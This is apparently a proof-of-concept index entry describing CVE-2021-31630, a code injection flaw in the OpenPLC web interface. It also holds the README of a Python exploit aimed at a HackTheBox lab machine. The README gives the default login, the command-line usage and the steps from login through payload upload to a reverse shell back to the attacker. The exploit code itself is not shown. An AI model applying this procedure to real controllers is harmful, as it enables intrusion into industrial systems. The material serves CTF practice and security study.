PoC details: 301bf2e4c83cb37a48e59d949b8dfa4c464950e7

Source
Related vulnerability
Title: OpenPLC code injection vulnerability (CVE-2021-31630)
Description: OpenPLC is an open-source programmable logic controller that provides a low-cost industrial solution for automation and research. OpenPLC v3 contains a code injection vulnerability: the Hardware Layer Code Box component on the /hardware page of the product's web service does not filter special characters in its input. An attacker can use this flaw to execute system commands.
Description
A simple python script to exploit CVE-2021-31630 on HTB WifineticTwo CTF
Introduction
# CVE-2021-31630 Exploit PoC

This Python script is a Proof of Concept (PoC) exploit for CVE-2021-31630, targeting a vulnerability in OpenPLC running on the WifineticTwo box at HackTheBox. It is designed for educational purposes only, aiming to demonstrate the exploitation process in a controlled environment.

## Disclaimer

This tool is intended for security research and educational purposes only. Use of this tool for attacking targets without prior mutual consent is illegal. The developer will not be held responsible for any damages or criminal charges against users misusing this exploit.

## Prerequisites

Before running this exploit, ensure you have:

- Python 3 installed on your system.
- The `requests` library installed. You can install it using `pip install requests`.

## Usage

To use this exploit, you must specify the target's URL, the local host IP (LHOST), and the local port (LPORT) to which the reverse shell should connect back. Optionally, you can specify the username and password for OpenPLC if they differ from the default.

```shell
./exploit.py --target http://wifinetictwo.htb:8080 --lhost [LHOST] --lport [LPORT] [--usr [USERNAME] --pwd [PASSWORD]]
```

### Arguments

- `--target` - Target base address. Example: `http://wifinetictwo.htb:8080`
- `--lhost` - Local host IP address for the reverse shell to connect back to.
- `--lport` - Local port for the reverse shell to connect back to.
- `--usr` - (Optional) Username for OpenPLC. Default is `openplc`.
- `--pwd` - (Optional) Password for OpenPLC. Default is `openplc`.

## Features

- Automatically handles the login process using provided credentials.
- Crafts and uploads a malicious payload to achieve remote code execution.
- Initiates a reverse shell back to the attacker's specified IP and port.

## Exploit Process

1. **Login**: The script logs into the OpenPLC application using the provided credentials.
2. **Payload Crafting**: Dynamically crafts a malicious payload designed to initiate a reverse shell.
3. **Payload Upload**: Uploads the crafted payload to the server.
4. **Exploit Trigger**: Triggers the exploit by attempting to compile the uploaded malicious code, resulting in a reverse shell.
## Acknowledgements

- Special thanks to [Fellipe Oliveira](https://packetstormsecurity.com/files/162563/OpenPLC-WebServer-3-Remote-Code-Execution.html) who discovered and reported CVE-2021-31630.
- HackTheBox for providing a realistic environment to practice and learn about cybersecurity.
File snapshot

[4.0K] /data/pocs/301bf2e4c83cb37a48e59d949b8dfa4c464950e7
├── [4.9K] exploit.py
└── [2.4K] README.md

0 directories, 2 files